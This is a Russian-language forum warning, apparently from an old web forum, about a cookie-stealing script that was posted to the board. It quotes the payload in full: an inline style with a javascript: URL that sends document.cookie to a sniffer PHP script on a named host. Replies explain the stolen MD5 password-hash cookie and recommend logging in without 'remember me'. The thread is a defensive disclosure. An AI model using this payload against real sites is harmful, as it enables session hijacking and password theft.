!ВНИМАНИЕ ОПАCНОСТЬ ХИЩЕНИЯ!, ВАШИХ ПАРОЛЕЙ Опции

[Leon PRO]

Если вам опера выдает в постах или в любой точке форума что-то типа:

` style=`background:url(javaSCript:document.images[1].src="http://runiverse.net/forum/images/avatars/xxx/snif.php?"+document.cookie)`

Или по ПМ, или в любом виде - немедленно сообщите об этом Айвану, ДБКолу или любому супермодератору, чтобы автор этих сообшений был забанен.

Этот скрипт опасен. Он похищает ваши пароли.

[slavaz]

Скрипт ворует кукисы, один из кукисов называется pass_hash
В этом куке хранится MD5 от пароля (хэш пароля). Вроде ничего, но только существуют средства, как подобрать пароль, чтобы MD5 совпал. То есть, пароль не обязательно должен совпадать с вашим, достаточно, что результат функции md5() будет одинаковым и для вашего пароля, и для свежеподобранного.

Защита от этого зловредного скриптика проста, как валенок: надо выйти из форума (отлогиниться), затем опять загогиниться, но на форме логина НЕ СТАВИТЬ ГАЛКУ "запомнить меня". И все. Галка не стоит - захэшированный пароль в кукисах не валяется - и воруйте, хоть обворуйтесь. Недостаток тут только один: при каждом посещении форума надо авторизироваться, но с моей личной точки зрения (ИМХО) это скорее достоинство...
Добавлено в 01:55
Добавлю...
Кстати, ворует оно только кукисы того хоста (домена), где было запущено. То есть кукисы для, скажем, mail.ru на wrg.ru получить будет невозможно. Аналогично и обратное. Это особенности кукисной системы и честь и хвала Netscape, что в своё время с умом сделали эту технологию.
Добавлено в 02:09